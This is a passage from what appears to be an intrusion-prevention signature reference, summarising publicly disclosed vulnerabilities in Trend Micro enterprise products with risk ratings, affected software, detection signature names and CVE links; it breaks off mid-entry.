Trend-Micro-Control-Manager-Task_Controller-Information-Disclosure

About this vulnerability:	A vulnerability in Trend Micro Control Manager
Risk:	Moderate
First detected in:	sgpkg-ips-791-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro Control Manager
Type:	Input Validation
Description:	Insufficient validation of URI parameters when handling requests results in an information disclosure vulnerability in Trend Micro Control Manager. A successful exploitation allows an attacker to access arbitrary files on the target system.
Situation:	HTTP_CRL-Trend-Micro-Control-Manager-Task_Controller-Information-Disclosure

Trend-Micro-Control-Manager-Threatdistributedtrail-Threatname-SQL-Injection

About this vulnerability:

A vulnerability in Trend Micro Control Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1081-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro Control Manager

Type:

Input Validation

Description:

Improper validation of user-supplied input for the ThreatName HTTP parameter in requests to the ThreatDistributedTrail resource causes an SQL injection vulnerability in Trend Micro Control Manager. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the service.

Situation:

HTTP_CSU-Trend-Micro-Control-Manager-Threatdistributedtrail-Threatname-SQL-Injection

References:

CVE-2018-3606
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3606

Trend-Micro-Control-Manager-Treeusercontrol-Information-Disclosure

About this vulnerability:	A vulnerability in Trend Micro Control Manager
Risk:	Moderate
First detected in:	sgpkg-ips-798-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro Control Manager
Type:	Input Validation
Description:	Improper validation of XML results in a vulnerability in Trend Micro Control Manager. A successful exploitation allows arbitrary files on the target system to be read.
Situation:	HTTP_CS-Trend-Micro-Control-Manager-Treeusercontrol_Process_Tree_Event-Information-Disclosure

Trend-Micro-Control-Manager-Widget-Importfile.php-Directory-Traversal

About this vulnerability:	A vulnerability in Trend Micro Control Manager
Risk:	High
First detected in:	sgpkg-ips-859-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro Control Manager
Type:	Input Validation
Description:	There exists a directory traversal vulnerability in Trend Micro Control Manager. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.
Situation:	HTTP_CRL-Trend-Micro-Control-Manager-Widget-Importfile.php-Directory-Traversal

Trend-Micro-Endpoint-Application-Control-Filedrop-Directory-Traversal

About this vulnerability:

A vulnerability in Trend Micro Endpoint Application Control

Risk:

Moderate

First detected in:

sgpkg-ips-1071-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro Endpoint Application Control

Type:

Directory Traversal

Description:

There has been reported a directory traversal vulnerability in Trend Micro Endpoint Application Control. A remote attacker could exploit this by sending a maliciously crafted HTTP request to the target server. Successful exploitation could result in the arbitrary code execution.

Situation:

HTTP_CSH-Trend-Micro-Endpoint-Application-Control-Filedrop-Directory-Traversal

References:

CVE-2018-10357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10357

Trend-Micro-Imsva-Management-Portal-Authentication-Bypass

About this vulnerability:

A vulnerability in Trend Micro InterScan Messaging Security (Virtual Appliance)

Risk:

Moderate

First detected in:

sgpkg-ips-1045-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro InterScan Messaging Security (Virtual Appliance)

Type:

Malfunction

Description:

There has been reported a authentication bypass in Trend Micro InterScan Mail Security Virtual Appliance. Successful exploitation could allow the attacker to access the target server without credentials.

Situation:

HTTP_CSU-Trend-Micro-Imsva-Management-Portal-Authentication-Bypass

References:

CVE-2018-3609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3609

Trend-Micro-Internet-Security-Pro-2010-ActiveX-ExtSetOwner

About this vulnerability:

A vulnerability in Trend Micro Internet Security Pro

Risk:

High

First detected in:

sgpkg-ips-373-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Trend Micro Internet Security Pro

Type:

Malfunction

Description:

There is a code execution vulnerability in Trend Micro Internet Security Pro 2010 ActiveX control. The vulnerability is due to an error while parsing a parameter to the extSetOwner function. By specifying a specially crafted address, the process can call into a controlled memory region. An attacker can exploit this vulnerability by enticing a user to visit a maliciously crafted web site. This can result in code execution under the privileges of the current user.

Situation:

HTTP_SS-Trend-Micro-Internet-Security-Pro-2010-ActiveX-ExtSetOwner
File-Text_Trend-Micro-Internet-Security-Pro-2010-ActiveX-ExtSetOwner

References:

CVE-2010-3189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3189

OSVDB-67561
http://www.osvdb.org/67561

Trend-Micro-InterScan-Messaging-Policywsaction-External-Entity-Injection

About this vulnerability:

A vulnerability in Trend Micro InterScan Messaging Virtual Appliance

Risk:

Moderate

First detected in:

sgpkg-ips-1313-5242

Last changed:

sgpkg-ips-1313-5242

Platform:

Generic

Software:

Trend Micro InterScan Messaging Security (Virtual Appliance)

Type:

Input Validation

Description:

An XXE vulnerability exists in Trend Micro InterScan Messaging Security Suite. The vulnerability is due to insufficient validation of XML data in the Java class PolicyWSAction. A remote, authenticated attacker could exploit this vulnerability by sending malicious XML data in the HTTP requests to the target server. Successful exploitation could result in the disclosure of file contents on the target machine.

Situation:

HTTP_CRL-Trend-Micro-InterScan-Messaging-Policywsaction-External-Entity-Injection

References:

CVE-2020-27017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27017

Trend-Micro-InterScan-Messaging-Security-Modtmcss-Command-Injection

About this vulnerability:

A vulnerability in Trend Micro InterScan Messaging Security (Virtual Appliance)

Risk:

Moderate

First detected in:

sgpkg-ips-1010-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro InterScan Messaging Security (Virtual Appliance)

Type:

Input Validation

Description:

Improper validation of HTTP request parameters causes a command injection vulnerability in Trend Micro InterScan Messaging Security. A successful exploit allows an attacker to run arbitrary code on the target system with the privileges of the server process.

Situation:

HTTP_CRL-Trend-Micro-InterScan-Messaging-Security-Modtmcss-Command-Injection

References:

CVE-2017-11391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11391

Trend-Micro-InterScan-Messaging-Security-Remote-Code-Execution

About this vulnerability:

A Trend Micro InterScan Messaging Security Remote Code Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-1016-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

Trend Micro InterScan Messaging Security (Virtual Appliance)

Type:

Input Validation

Description:

A vulnerability in Trend Micro InterScan Messaging Security (VirtualAppliance) which allows remote attackers to inject arbitrary commands due to improper sanitization of user inputs to the saveCert.imss endpoint.

Situation:

HTTP_CRL-Trend-Micro-InterScan-Messaging-Security-Remote-Code-Execution

References:

CVE-2017-6398
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6398

BID-96859
http://www.securityfocus.com/bid/96859

Trend-Micro-InterScan-Messaging-Widget-Information-Disclosure

About this vulnerability:

A vulnerability in Trend Micro InterScan Messaging Security (Virtual Appliance)

Risk:

Moderate

First detected in:

sgpkg-ips-1311-5242

Last changed:

sgpkg-ips-1311-5242

Platform:

Generic

Software:

Trend Micro InterScan Messaging Security (Virtual Appliance)

Type:

Malfunction

Description:

Improper access controls in Trend Micro Insterscan cause an information disclosure vulnerability that can be exploited to gain access to information which can be of use in further exploitation.

Situation:

HTTP_CSU-Trend-Micro-InterScan-Messaging-Widget-Information-Disclosure

References:

CVE-2020-27019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27019

Trend-Micro-InterScan-Web-Security-Decryptpasswd-Buffer-Overflow

About this vulnerability:

A vulnerability in Trend Micro InterScan Web Security Virtual Appliance

Risk:

Moderate

First detected in:

sgpkg-ips-1313-5242

Last changed:

sgpkg-ips-1313-5242

Platform:

Generic

Software:

Trend Micro InterScan Web Security Virtual Appliance

Type:

Buffer Overflow

Description:

Improper validation of the length of user-supplied data in HTTP requests causes a buffer overflow vulnerability in Trend Micro InterScan Web Security. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Trend-Micro-InterScan-Web-Security-Virtual-Appliance-Decryptpasswd-Buffer-Overflow

References:

CVE-2020-28578
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28578

Trend-Micro-InterScan-Web-Security-Virtual-Appliance-Password-Command-Injection

About this vulnerability:

A vulnerability in Trend Micro InterScan Web Security Virtual Appliance

Risk:

High

First detected in:

sgpkg-ips-1320-5242

Last changed:

sgpkg-ips-1320-5242

Platform:

Generic

Software:

Trend Micro InterScan Web Security Virtual Appliance

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Trend Micro InterScan Web Security Virtual Appliance. The vulnerability is due to improper validation of user-supplied data in HTTP requests. A remote, unauthenticated attacker can exploit the vulnerabilities by sending a malicious request to the target server. Successful exploitation of these vulnerabilities could allow arbitrary command execution on the target server in the security context of iscan account.

Situation:

HTTP_CRL-Trend-Micro-InterScan-Web-Security-Virtual-Appliance-Password-Command-Injection

References:

CVE-2020-8466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8466

Trend-Micro-Iwsva-Deploymentwizardaction-Getclusterinfo-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk:	Moderate
First detected in:	sgpkg-ips-941-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro InterScan Web Security Virtual Appliance
Type:	Input Validation
Description:	Improper validation of requests to the Getclusterinfo servlet causes a command injection vulnerability in Trend Micro InterScan Web Security Virtual Appliance. A successful exploitation allows an attacker to run arbitrary commands on the target system.
Situation:	HTTP_CRL-Trend-Micro-Iwsva-Deploymentwizardaction-Getclusterinfo-Command-Injection

Trend-Micro-Iwsva-Domains-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk:	High
First detected in:	sgpkg-ips-771-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro InterScan Web Security Virtual Appliance
Type:	Input Validation
Description:	There exists a command injection vulnerability in Trend Micro InterScan Web Security Virtual Appliance (IWSVA). A remote attacker could use this to execute arbitrary code on the affected system.
Situation:	HTTP_CRL-Trend-Micro-Iwsva-Domains-Command-Injection

Trend-Micro-Iwsva-HttpServlet-Command-Injection

About this vulnerability:	A Trend Micro Iwsva HttpServlet Command Injection vulnerability
Risk:	High
First detected in:	sgpkg-ips-932-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro InterScan Web Security Virtual Appliance
Type:	Input Validation
Description:	A remote code execution vulnerability in Trend Micro IWSVA, 6.5 prior to 6.5 SP2 HF 1755, which allows remote attackers to execute remote commands via the netid, netmask, router, and interface_vlanid_sel parameters, due to incorrect input validation.
Situation:	HTTP_CRL-Trend-Micro-Iwsva-HttpServlet-Command-Injection

Trend-Micro-Iwsva-Logsettinghandler-Dopostmountdevice-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk:	Moderate
First detected in:	sgpkg-ips-870-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro InterScan Web Security Virtual Appliance
Type:	Input Validation
Description:	Improper validation of request parameters causes a command injection vulnerability in Trend Micro InterScan Web Security Virtual Appliance. A successful exploitation can allow an attacker to run arbitrary code on the target system.
Situation:	File-Text_Trend-Micro-Iwsva-Logsettinghandler-Dopostmountdevice-Command-Injection

Trend-Micro-Iwsva-Mailnotification-Buffer-Overflow

About this vulnerability:

A vulnerability in Trend Micro InterScan Web Security Virtual Appliance

Risk:

High

First detected in:

sgpkg-ips-1314-5242

Last changed:

sgpkg-ips-1314-5242

Platform:

Generic

Software:

Trend Micro InterScan Web Security Virtual Appliance

Type:

Buffer Overflow

Description:

A stack buffer overflow has been reported in Trend Micro InterScan Web Security Virtual Appliance. The vulnerability is due to improper validation of the length of user-supplied data in HTTP requests. A remote, authenticated attacker can exploit the vulnerability by sending a malicious request to the target server. Successful exploitation of this vulnerability could allow arbitrary code execution on the target server in the security context of iscan account.

Situation:

HTTP_CRL-Trend-Micro-Iwsva-Mailnotification-Buffer-Overflow

References:

CVE-2020-28579
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28579

Trend-Micro-Iwsva-Managepatches-Filename-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk:	Moderate
First detected in:	sgpkg-ips-769-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro InterScan Web Security Virtual Appliance
Type:	Input Validation
Description:	Improper validation of request parameters cause a command injection vulnerability in the Trend Micro InterScan Web Security Virtual Appliance. A successful exploitation allows an attacker to run commands as root.
Situation:	HTTP_CS-Trend-Micro-Iwsva-Managepatches-Filename-Command-Injection

Trend-Micro-Iwsva-Managevlansettings-Command-Injections

About this vulnerability:

A vulnerability in Trend Micro InterScan Web Security Virtual Appliance

Risk:

High

First detected in:

sgpkg-ips-1318-5242

Last changed:

sgpkg-ips-1318-5242

Platform:

Generic

Software:

Trend Micro InterScan Web Security Virtual Appliance

Type:

Input Validation

Description:

Two command injection vulnerabilities have been reported in Trend Micro InterScan Web Security Virtual Appliance. The vulnerabilities are due to improper validation of user-supplied data in HTTP requests. A remote, authenticated attacker can exploit the vulnerabilities by sending a malicious request to the target server. Successful exploitation of these vulnerabilities could allow arbitrary command execution on the target server in the security context of iscan account.

Situation:

HTTP_CRL-Trend-Micro-Iwsva-Managevlansettings-Command-Injections

References:

CVE-2020-28581
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28581

Trend-Micro-Iwsva-Pacfilemanagement-Delete_Pac_Files-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk:	Moderate
First detected in:	sgpkg-ips-913-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro InterScan Web Security Virtual Appliance
Type:	Input Validation
Description:	Improper validation of requests to the PacFileManagement servlet causes a command injection vulnerability in Trend Micro InterScan Web Security Virtual Appliance. A successful exploitation allows an attacker to run arbitrary commands on the target system.
Situation:	HTTP_CRL-Trend-Micro-Iwsva-Pacfilemanagement-Delete_Pac_Files-Command-Injection

Trend-Micro-Iwsva-Reporthandler-Docmd-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk:	High
First detected in:	sgpkg-ips-919-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro InterScan Web Security Virtual Appliance
Type:	Malfunction
Description:	There exists a command injection vulnerability in Trend Micro InterScan Web Security Virtual Appliance (IWSVA).
Situation:	HTTP_CSU-Trend-Micro-Iwsva-Reporthandler-Docmd-Command-Injection

Trend-Micro-Iwsva-TestConfiguration-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk:	High
First detected in:	sgpkg-ips-769-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro InterScan Web Security Virtual Appliance
Type:	Input Validation
Description:	There exists a command injection vulnerability in Trend Micro InterScan Web Security Virtual Appliance.
Situation:	HTTP_CRL-Trend-Micro-Iwsva-TestConfiguration-Command-Injection

Trend-Micro-Iwsva-VerboseLog-Directory-Traversal

About this vulnerability:	A Trend Micro Iwsva VerboseLog Directory Traversal vulnerability
Risk:	Moderate
First detected in:	sgpkg-ips-933-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro InterScan Web Security Virtual Appliance
Type:	Input Validation
Description:	A directory traversal vulnerability in Trend Micro IWSVA, 6.5 prior to 6.5 CP 1746, which allows remote attackers access to sensitive information by sending a crafted HTTP request, due to incorrect input validation.
Situation:	HTTP_CRL-Trend-Micro-Iwsva-VerboseLog-Directory-Traversal

Trend-Micro-Iwsva-WMI_Domain_Controllers-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro InterScan Web Security Virtual Appliance
Risk:	Moderate
First detected in:	sgpkg-ips-770-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro InterScan Web Security Virtual Appliance
Type:	Input Validation
Description:	Improper validation of request parameters cause a command injection vulnerability in the Trend Micro InterScan Web Security Virtual Appliance. A successful exploitation allows an attacker to run commands as root.
Situation:	HTTP_CS-Trend-Micro-Iwsva-WMI_Domain_Controllers-Command-Injection

Trend-Micro-Mobile-Security-Enterprise-Client_Info-Slink_Id-SQL-Injection

About this vulnerability:

A vulnerability in Trend Micro Mobile Security (Enterprise)

Risk:

Moderate

First detected in:

sgpkg-ips-998-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro Mobile Security

Type:

Input Validation

Description:

Insufficient validation of the slink_id request parameter with eas_agent_sync_client_info action causes an SQL injection vulnerability in Trend Micro Mobile Security. A successful exploit may allow arbitrary code execution on the target system.

Situation:

HTTP_CS-Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Sync_Client_Info-Slink_Id-SQL-Injection
HTTP_CSU-Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Sync_Client_Info-Slink_Id-SQL-Injection
File-Text_Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Sync_Client_Info-Slink_Id-SQL-Injection

References:

CVE-2017-14078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14078

Trend-Micro-Mobile-Security-Enterprise-Eas_Agent-Slink_Id-SQL-Injection

About this vulnerability:

A vulnerability in Trend Micro Mobile Security (Enterprise)

Risk:

Moderate

First detected in:

sgpkg-ips-993-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro Mobile Security

Type:

Input Validation

Description:

Improper parsing of requests causes an SQL injection vulnerability in Trend Micro Mobile Security. A successful exploit may allow remote code execution with system privileges without authentication.

Situation:

HTTP_CRL-Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Unregister-Slink_Id-SQL-Injection
HTTPS_CS-Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Unregister-Slink_Id-SQL-Injection
File-Text_Trend-Micro-Mobile-Security-Enterprise-Eas_Agent_Unregister-Slink_Id-SQL-Injection

References:

CVE-2017-14078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14078

Trend-Micro-Mobile-Security-Enterprise-Get_dep_Profile-Id-SQL-Injection

About this vulnerability:

A vulnerability in Trend Micro Mobile Security (Enterprise)

Risk:

Moderate

First detected in:

sgpkg-ips-1036-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro Mobile Security

Type:

Input Validation

Description:

There has been reported an SQL injection vulnerability in Trend Micro Mobile Security Enterprise. The value of id request parameter isn't properly validated to prevent SQL injections. Successful exploitation may allow remote code execution with system privileges without authentication.

Situation:

HTTP_CRL-Trend-Micro-Mobile-Security-Enterprise-Get_dep_Profile-Id-SQL-Injection
HTTPS_CS-Trend-Micro-Mobile-Security-Enterprise-Get_dep_Profile-Id-SQL-Injection

References:

CVE-2017-14078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14078

Trend-Micro-Mobile-Security-Web_Service-Path-Traversal

About this vulnerability:

A vulnerability in Trend Micro Mobile Security (Enterprise)

Risk:

Moderate

First detected in:

sgpkg-ips-1608-5242

Last changed:

sgpkg-ips-1608-5242

Platform:

Generic

Software:

Trend Micro Mobile Security (Enterprise); Trend Micro Mobile Security (Enterprise)

Type:

Directory Traversal

Description:

Insufficient validation of the user-supplied data sent to the web_service.dll controller causes a file deletion / path traversal vulnerability in Trend Micro Mobile Security. A successful exploit allows an attacker to delete arbitrary files on the target system.

Situation:

HTTP_CRL-Trend-Micro-Mobile-Security-Web_Service-Path-Traversal

References:

CVE-2023-32521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32521

Trend-Micro-OfficeScan-Console-Authentication-Buffer-Overflow

About this vulnerability:

A vulnerability in Trend Micro OfficeScan Corporate Edition

Risk:

Moderate

First detected in:

sgpkg-ips-435-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro OfficeScan Corporate Edition

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the way Trend Micro OfficeScan management console handles HTTP requests. The vulnerability is due to lack of boundary protection while processing HTTP cookie strings. Remote unauthenticated attackers can exploit this vulnerability to take complete control of an affected system. In an attack case where code injection is not successful, the affected application will suspend abnormally. The attacker might consume all the system resource by sending continuous requests and create a denial-of-service condition to the affected server. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service.

Situation:

Generic_CS-Trend-Micro-OfficeScan-Console-Authentication-Buffer-Overflow
TLS_CS-Trend-Micro-OfficeScan-Console-Authentication-Buffer-Overflow

References:

CVE-2007-3454
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3454

BID-24641
http://www.securityfocus.com/bid/24641

OSVDB-36629
http://www.osvdb.org/36629

Trend-Micro-OfficeScan-Corporate-Edition-Buffer-Overflow

About this vulnerability:

Trend Micro OfficeScan Corporate Edition Stack Based Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-648-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Trend Micro OfficeScan Corporate Edition

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Trend Micro OfficeScan Corporate Edition, 8.0 Patch 2 build 1189 and earlier and 7.3 Patch 3 build 1314 and earlier, which allows attackers to remotly execute arbitrary code or cause a denial of service via a long encrypted password.

Situation:

File-Text_Trend-Micro-OfficeScan-Corporate-Edition-Buffer-Overflow

References:

CVE-2008-1365
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1365

BID-28020
http://www.securityfocus.com/bid/28020

OSVDB-42499
http://www.osvdb.org/42499

Trend-Micro-OfficeScan-objRemoveCtrl-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in the Trend Micro OfficeScan objRemoveCtrl ActiveX control

Risk:

High

First detected in:

sgpkg-ips-161-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Trend Micro OfficeScan Corporate Edition

Type:

Buffer Overflow

Description:

Trend Micro OfficeScan has a stack-based buffer overflow vulnerability. When a target user with a vulnerable version of the affected product visits a malicious web page containing an excessively long value assigned to one or more properties of the ObjRemoveCtrl object, code execution with the privileges of the currently logged in user may occur.

Situation:

HTTP_SS-Trend-Micro-OfficeScan-objRemoveCtrl-ActiveX-Control-Buffer-Overflow
File-Text_Trend-Micro-OfficeScan-objRemoveCtrl-ActiveX-Control-Buffer-Overflow

References:

CVE-2008-3364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3364

BID-30407
http://www.securityfocus.com/bid/30407

OSVDB-47213
http://www.osvdb.org/47213

Trend-Micro-OfficeScan-Proxy.php-Command-Injection

About this vulnerability:

A vulnerability in Trend Micro OfficeScan

Risk:

Moderate

First detected in:

sgpkg-ips-970-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro OfficeScan

Type:

Input Validation

Description:

Improper handling of HTTP parameter contents causes a command injection vulnerability in Trend Micro OfficeScan. A successful exploit allows arbitrary commands to be executed by a remote attacker without authentication with the privileges of the server process.

Situation:

HTTP_CRL-Trend-Micro-OfficeScan-Proxy.php-Command-Injection

References:

CVE-2017-11394
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11394

Trend-Micro-OfficeScan-Server-cgiRecvFile-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Trend Micro's OfficeScan

Risk:

High

First detected in:

sgpkg-ips-172-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Trend Micro OfficeScan Corporate Edition; Trend Micro Client Server Messaging Security for SMB

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Trend Micro's OfficeScan. A remote attacker can send a crafted HTTP request message to the Trend OfficeScan server to execute arbitrary code with the privileges of the affected service, normally System.

Situation:

HTTP_CRL-Trend-Micro-OfficeScan-Server-cgiRecvFile-Buffer-Overflow

References:

CVE-2008-2437
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2437

BID-31139
http://www.securityfocus.com/bid/31139

Trend-Micro-OfficeScan-Zip-Directory-Traversal-CVE-2019-18187

About this vulnerability:

A vulnerability in Trend Micro OfficeScan

Risk:

Moderate

First detected in:

sgpkg-ips-1210-5242

Last changed:

sgpkg-ips-1858-5242

Platform:

Generic

Software:

Trend Micro OfficeScan

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Trend Micro's OfficeScan. The vulnerability is due to insufficient handling of directory traversal characters in uploaded ZIP archives. A remote, authenticated attacker could exploit this vulnerability by sending a request containing a crafted ZIP file to the OfficeScan server. Successful exploitation could result in arbitrary code execution in the context of the server application.

Situation:

HTTP_CS-Trend-Micro-OfficeScan-Zip-Directory-Traversal-CVE-2019-18187
File-Zip_Trend-Micro-OfficeScan-Zip-Directory-Traversal-CVE-2019-18187

References:

CVE-2019-18187
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18187

Trend-Micro-Safesync-Enterprise-Storage-Discovery_iSCSI_Device-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro SafeSync for Enterprise
Risk:	Moderate
First detected in:	sgpkg-ips-864-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro SafeSync for Enterprise
Type:	Input Validation
Description:	Incorrect validation of request parameters in Trend Micro's SafeSync for Enterprise storage.pm page causes a command injection vulnerability. A successful exploit allows an attacker to run arbitrary code with root privileges.
Situation:	HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Storage-Discovery_iSCSI_Device-Command-Injection

Trend-Micro-Safesync-For-Enterprise-Ad.pm-Id-Remote-Command-Execution

About this vulnerability:	A vulnerability in Trend Micro SafeSync for Enterprise
Risk:	High
First detected in:	sgpkg-ips-809-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro SafeSync for Enterprise
Type:	Input Validation
Description:	There exists a remote command execution vulnerability in Trend Micro SafeSync for Enterprise ad.pm page.
Situation:	HTTPS_SS-Trend-Micro-Safesync-For-Enterprise-Ad.pm-Id-Remote-Command-Execution File-Text_Trend-Micro-Safesync-For-Enterprise-Ad.pm-Id-Remote-Command-Execution

Trend-Micro-Safesync-For-Enterprise-Check_NFS_Server_Status-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro SafeSync for Enterprise
Risk:	Moderate
First detected in:	sgpkg-ips-945-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro SafeSync for Enterprise
Type:	Input Validation
Description:	Insufficient validation of user-supplied data causes a command injection vulnerability in Trend Micro's SafeSync for Enterprise. A successful attack allows arbitrary code to be run as root on the target system.
Situation:	File-Text_Trend-Micro-Safesync-For-Enterprise-Check_NFS_Server_Status-Command-Injection

Trend-Micro-Safesync-For-Enterprise-Dead_Local_Device-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro SafeSync for Enterprise
Risk:	Moderate
First detected in:	sgpkg-ips-956-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro SafeSync for Enterprise
Type:	Input Validation
Description:	Improper validation of requests causes a command injection vulnerability in Trend Micro SafeSync for Enterprise. A successful exploit allows an attacker to run arbitrary commands on the target system witohut authentication.
Situation:	HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Dead_Local_Device-Command-Injection

Trend-Micro-Safesync-For-Enterprise-Devicetool-Devid-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro SafeSync for Enterprise
Risk:	Moderate
First detected in:	sgpkg-ips-880-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro SafeSync for Enterprise
Type:	Input Validation
Description:	Insufficient validation of request data causes a command injection vulnerability in Trend Micro SafeSync for Enterprise. A successful exploitation allows an attacker to run arbitrary commands as root.
Situation:	HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Devicetool-Devid-Command-Injection

Trend-Micro-Safesync-For-Enterprise-Devicetool.pm-Get_Device_Info-SQL-Injection

About this vulnerability:	A vulnerability in Trend Micro SafeSync for Enterprise
Risk:	Moderate
First detected in:	sgpkg-ips-863-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro SafeSync for Enterprise
Type:	Input Validation
Description:	Insufficient validation of HTTP requests causes an SQL injection vulnerability in Trend Micro SafeSync for Enterprise. A successful exploit can allow an attacker to execute code with the privileges of the server process.
Situation:	HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Devicetool.pm-Get_Device_Info-SQL-Injection

Trend-Micro-Safesync-For-Enterprise-Devicetool.pm-Get_nic_Device-SQL-Injection

About this vulnerability:	A vulnerability in Trend Micro SafeSync for Enterprise
Risk:	High
First detected in:	sgpkg-ips-895-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro SafeSync for Enterprise
Type:	Input Validation
Description:	There exists an SQL Injection vulnerability in Trend Micro's SafeSync's deviceTool.pm Perl module. A remote, authenticated, attacker can use this to execute arbitrary code on the affected system.
Situation:	HTTP_CRL-Trend-Micro-Safesync-For-Enterprise-Devicetool.pm-Get_nic_Device-SQL-Injection

Trend-Micro-Safesync-For-Enterprise-License-Command-Injection

About this vulnerability:	A vulnerability in Trend Micro SafeSync for Enterprise
Risk:	Moderate
First detected in:	sgpkg-ips-938-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Trend Micro SafeSync for Enterprise
Type:	Input Validation
